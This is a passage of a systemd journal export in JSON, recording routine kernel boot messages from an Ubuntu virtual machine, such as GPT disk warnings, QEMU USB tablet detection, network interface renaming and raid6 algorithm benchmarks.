"_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1432467", "MESSAGE" : "GPT:Primary header thinks Alt. header is not at the end of the disk." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a6;b=e2b08827b5804427b422c10c84f1567e;m=5736b0;t=5bd16dd1ab618;x=4cac53a8770fc56d", "__REALTIME_TIMESTAMP" : "1615280779998744", "__MONOTONIC_TIMESTAMP" : "5715632", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1436976", "MESSAGE" : "GPT:4612095 != 41943039" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a7;b=e2b08827b5804427b422c10c84f1567e;m=5736bc;t=5bd16dd1ab623;x=1f89e9c78d034e8f", "__REALTIME_TIMESTAMP" : "1615280779998755", "__MONOTONIC_TIMESTAMP" : "5715644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1438992", "MESSAGE" : "GPT:Alternate GPT header not at the end of the disk." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a8;b=e2b08827b5804427b422c10c84f1567e;m=5736c7;t=5bd16dd1ab62e;x=f98f5d259b2bc42", "__REALTIME_TIMESTAMP" : "1615280779998766", "__MONOTONIC_TIMESTAMP" : "5715655", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "MESSAGE" : "GPT:4612095 != 41943039", "_SOURCE_MONOTONIC_TIMESTAMP" : "1442022" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a9;b=e2b08827b5804427b422c10c84f1567e;m=5736d2;t=5bd16dd1ab63a;x=eec1178dae8a019d", "__REALTIME_TIMESTAMP" : "1615280779998778", "__MONOTONIC_TIMESTAMP" : "5715666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "1443904", "MESSAGE" : "GPT: Use GNU Parted to correct GPT errors." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1aa;b=e2b08827b5804427b422c10c84f1567e;m=5736dd;t=5bd16dd1ab645;x=103e0e1edea30124", "__REALTIME_TIMESTAMP" : "1615280779998789", "__MONOTONIC_TIMESTAMP" : "5715677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1446596", "MESSAGE" : " vda: vda1 vda14 vda15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ab;b=e2b08827b5804427b422c10c84f1567e;m=5737aa;t=5bd16dd1ab712;x=5c729b3bea69173c", "__REALTIME_TIMESTAMP" : "1615280779998994", "__MONOTONIC_TIMESTAMP" : "5715882", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-1", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1448430", "MESSAGE" : "usb 1-1: new full-speed USB device number 2 using uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ac;b=e2b08827b5804427b422c10c84f1567e;m=5737bc;t=5bd16dd1ab723;x=3f7f6606021883a3", "__REALTIME_TIMESTAMP" : "1615280779999011", "__MONOTONIC_TIMESTAMP" : "5715900", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1454205", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ad;b=e2b08827b5804427b422c10c84f1567e;m=5737c7;t=5bd16dd1ab72e;x=82b9b7cf8de193ea", "__REALTIME_TIMESTAMP" : "1615280779999022", "__MONOTONIC_TIMESTAMP" : "5715911", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1464412", "MESSAGE" : "input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ae;b=e2b08827b5804427b422c10c84f1567e;m=5737d5;t=5bd16dd1ab73d;x=5c0c31abe2badf4e", "__REALTIME_TIMESTAMP" : "1615280779999037", "__MONOTONIC_TIMESTAMP" : "5715925", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1492169", "MESSAGE" : "AVX2 version of gcm_enc/dec engaged." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1af;b=e2b08827b5804427b422c10c84f1567e;m=5737e0;t=5bd16dd1ab748;x=940d0df36e6f4f07", "__REALTIME_TIMESTAMP" : "1615280779999048", "__MONOTONIC_TIMESTAMP" : "5715936", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1494593", "MESSAGE" : "AES CTR mode by8 optimization enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b0;b=e2b08827b5804427b422c10c84f1567e;m=573866;t=5bd16dd1ab7ce;x=49437386093b2439", "__REALTIME_TIMESTAMP" : "1615280779999182", "__MONOTONIC_TIMESTAMP" : "5716070", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "virtio", "_KERNEL_DEVICE" : "+virtio:virtio0", "_UDEV_SYSNAME" : "virtio0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1518610", "MESSAGE" : "virtio_net virtio0 ens3: renamed from eth0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b1;b=e2b08827b5804427b422c10c84f1567e;m=576eb1;t=5bd16dd1aee19;x=f8ac91959c4aa0c7", "__REALTIME_TIMESTAMP" : "1615280780013081", "__MONOTONIC_TIMESTAMP" : "5729969", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1637764", "MESSAGE" : "usb 1-1: New USB device found, idVendor=0627, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b2;b=e2b08827b5804427b422c10c84f1567e;m=576f8a;t=5bd16dd1aeef1;x=3dee08a725e18662", "__REALTIME_TIMESTAMP" : "1615280780013297", "__MONOTONIC_TIMESTAMP" : "5730186", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1642734", "MESSAGE" : "usb 1-1: New USB device strings: Mfr=1, Product=3, SerialNumber=5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b3;b=e2b08827b5804427b422c10c84f1567e;m=577050;t=5bd16dd1aefb7;x=f535519e98e61b88", "__REALTIME_TIMESTAMP" : "1615280780013495", "__MONOTONIC_TIMESTAMP" : "5730384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1647407", "MESSAGE" : "usb 1-1: Product: QEMU USB Tablet" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b4;b=e2b08827b5804427b422c10c84f1567e;m=57712b;t=5bd16dd1af092;x=f90ca1ec6fed0efe", "__REALTIME_TIMESTAMP" : "1615280780013714", "__MONOTONIC_TIMESTAMP" : "5730603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1650426", "MESSAGE" : "usb 1-1: Manufacturer: QEMU" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b5;b=e2b08827b5804427b422c10c84f1567e;m=5771cf;t=5bd16dd1af137;x=6effa3dd88249486", "__REALTIME_TIMESTAMP" : "1615280780013879", "__MONOTONIC_TIMESTAMP" : "5730767", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_UDEV_DEVNODE" : "/dev/bus/usb/001/002", "_UDEV_SYSNAME" : "1-1", "_KERNEL_DEVICE" : "c189:1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1652712", "MESSAGE" : "usb 1-1: SerialNumber: 42" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b6;b=e2b08827b5804427b422c10c84f1567e;m=5771df;t=5bd16dd1af147;x=74843213c1fa40c2", "__REALTIME_TIMESTAMP" : "1615280780013895", "__MONOTONIC_TIMESTAMP" : "5730783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1663951", "MESSAGE" : "hidraw: raw HID events driver (C) Jiri Kosina" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b7;b=e2b08827b5804427b422c10c84f1567e;m=5771eb;t=5bd16dd1af152;x=3fa757cf0911c4bc", "__REALTIME_TIMESTAMP" : "1615280780013906", "__MONOTONIC_TIMESTAMP" : "5730795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1672727", "MESSAGE" : "usbcore: registered new interface driver usbhid" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b8;b=e2b08827b5804427b422c10c84f1567e;m=5771f6;t=5bd16dd1af15d;x=d7ad4f6be75220d5", "__REALTIME_TIMESTAMP" : "1615280780013917", "__MONOTONIC_TIMESTAMP" : "5730806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1675949", "MESSAGE" : "usbhid: USB HID core driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b9;b=e2b08827b5804427b422c10c84f1567e;m=577201;t=5bd16dd1af168;x=bad386160cda6776", "__REALTIME_TIMESTAMP" : "1615280780013928", "__MONOTONIC_TIMESTAMP" : "5730817", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1680012", "MESSAGE" : "input: QEMU QEMU USB Tablet as /devices/pci0000:00/0000:00:01.2/usb1/1-1/1-1:1.0/0003:0627:0001.0001/input/input5" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ba;b=e2b08827b5804427b422c10c84f1567e;m=5772b8;t=5bd16dd1af21f;x=60b309e1216b01cf", "__REALTIME_TIMESTAMP" : "1615280780014111", "__MONOTONIC_TIMESTAMP" : "5731000", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "hid", "_KERNEL_DEVICE" : "+hid:0003:0627:0001.0001", "_UDEV_SYSNAME" : "0003:0627:0001.0001", "_SOURCE_MONOTONIC_TIMESTAMP" : "1686104", "MESSAGE" : "hid-generic 0003:0627:0001.0001: input,hidraw0: USB HID v0.01 Mouse [QEMU QEMU USB Tablet] on usb-0000:00:01.2-1/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bb;b=e2b08827b5804427b422c10c84f1567e;m=5772c9;t=5bd16dd1af230;x=d78d55fa5ce30379", "__REALTIME_TIMESTAMP" : "1615280780014128", "__MONOTONIC_TIMESTAMP" : "5731017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3296328", "MESSAGE" : "raid6: sse2x1 gen() 7874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bc;b=e2b08827b5804427b422c10c84f1567e;m=5772d4;t=5bd16dd1af23b;x=ce4ea08b3ccb4878", "__REALTIME_TIMESTAMP" : "1615280780014139", "__MONOTONIC_TIMESTAMP" : "5731028", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3344238", "MESSAGE" : "raid6: sse2x1 xor() 5550 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bd;b=e2b08827b5804427b422c10c84f1567e;m=5772e4;t=5bd16dd1af24b;x=7bc7e78bc9790bf6", "__REALTIME_TIMESTAMP" : "1615280780014155", "__MONOTONIC_TIMESTAMP" : "5731044", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3392314", "MESSAGE" : "raid6: sse2x2 gen() 9546 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1be;b=e2b08827b5804427b422c10c84f1567e;m=5772ef;t=5bd16dd1af256;x=3dbd33bf27e28938", "__REALTIME_TIMESTAMP" : "1615280780014166", "__MONOTONIC_TIMESTAMP" : "5731055", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3440394", "MESSAGE" : "raid6: sse2x2 xor() 5985 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1bf;b=e2b08827b5804427b422c10c84f1567e;m=5772fa;t=5bd16dd1af261;x=7565dec281561875", "__REALTIME_TIMESTAMP" : "1615280780014177", "__MONOTONIC_TIMESTAMP" : "5731066", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3488308", "MESSAGE" : "raid6: sse2x4 gen() 11387 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c0;b=e2b08827b5804427b422c10c84f1567e;m=577304;t=5bd16dd1af26c;x=ad30cde6b6b3611d", "__REALTIME_TIMESTAMP" : "1615280780014188", "__MONOTONIC_TIMESTAMP" : "5731076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3536314", "MESSAGE" : "raid6: sse2x4 xor() 7165 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c1;b=e2b08827b5804427b422c10c84f1567e;m=57730f;t=5bd16dd1af276;x=298656716ca4c04c", "__REALTIME_TIMESTAMP" : "1615280780014198", "__MONOTONIC_TIMESTAMP" : "5731087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3584342", "MESSAGE" : "raid6: avx2x1 gen() 15727 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c2;b=e2b08827b5804427b422c10c84f1567e;m=57731a;t=5bd16dd1af281;x=b8ab218585856e3", "__REALTIME_TIMESTAMP" : "1615280780014209", "__MONOTONIC_TIMESTAMP" : "5731098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3632230", "MESSAGE" : "raid6: avx2x1 xor() 10348 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c3;b=e2b08827b5804427b422c10c84f1567e;m=577325;t=5bd16dd1af28c;x=c972aafa65f71950", "__REALTIME_TIMESTAMP" : "1615280780014220", "__MONOTONIC_TIMESTAMP" : "5731109", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3680173", "MESSAGE" : "raid6: avx2x2 gen() 18874 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c4;b=e2b08827b5804427b422c10c84f1567e;m=57732f;t=5bd16dd1af297;x=f9956d03be3640d1", "__REALTIME_TIMESTAMP" : "1615280780014231", "__MONOTONIC_TIMESTAMP" : "5731119", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3728145", "MESSAGE" : "raid6: avx2x2 xor() 11197 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c5;b=e2b08827b5804427b422c10c84f1567e;m=57733a;t=5bd16dd1af2a2;x=e3598bac0d84f0c6", "__REALTIME_TIMESTAMP" : "1615280780014242", "__MONOTONIC_TIMESTAMP" : "5731130", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3776130", "MESSAGE" : "raid6: avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c6;b=e2b08827b5804427b422c10c84f1567e;m=577345;t=5bd16dd1af2ac;x=b7e90dc8886b1e0d", "__REALTIME_TIMESTAMP" : "1615280780014252", "__MONOTONIC_TIMESTAMP" : "5731141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3824241", "MESSAGE" : "raid6: avx2x4 xor() 13990 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c7;b=e2b08827b5804427b422c10c84f1567e;m=577352;t=5bd16dd1af2ba;x=5b95a6e5199c574c", "__REALTIME_TIMESTAMP" : "1615280780014266", "__MONOTONIC_TIMESTAMP" : "5731154", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3826541", "MESSAGE" : "raid6: using algorithm avx2x4 gen() 22113 MB/s" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c8;b=e2b08827b5804427b422c10c84f1567e;m=57735d;t=5bd16dd1af2c5;x=8d5b31e4c883c5fd", "__REALTIME_TIMESTAMP" : "1615280780014277", "__MONOTONIC_TIMESTAMP" : "5731165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3829277", "MESSAGE" : "raid6: .... xor() 13990 MB/s, rmw enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c9;b=e2b08827b5804427b422c10c84f1567e;m=577368;t=5bd16dd1af2cf;x=6bc886e2a58855e5", "__REALTIME_TIMESTAMP" : "1615280780014287", "__MONOTONIC_TIMESTAMP" : "5731176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3831902", "MESSAGE" : "raid6: using avx2x2 recovery algorithm" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ca;b=e2b08827b5804427b422c10c84f1567e;m=577394;t=5bd16dd1af2fb;x=5df3582cd4095529", "__REALTIME_TIMESTAMP" : "1615280780014331", "__MONOTONIC_TIMESTAMP" : "5731220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3836699", "MESSAGE" : "xor: automatically using best checksumming function avx " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cb;b=e2b08827b5804427b422c10c84f1567e;m=5773a0;t=5bd16dd1af308;x=cc096be16c5b0a3a", "__REALTIME_TIMESTAMP" : "1615280780014344", "__MONOTONIC_TIMESTAMP" : "5731232", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "3842043", "MESSAGE" : "async_tx: api initialized (async)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1cc;b=e2b08827b5804427b422c10c84f1567e;m=5773af;t=5bd16dd1af316;x=6d453969632a59c1", 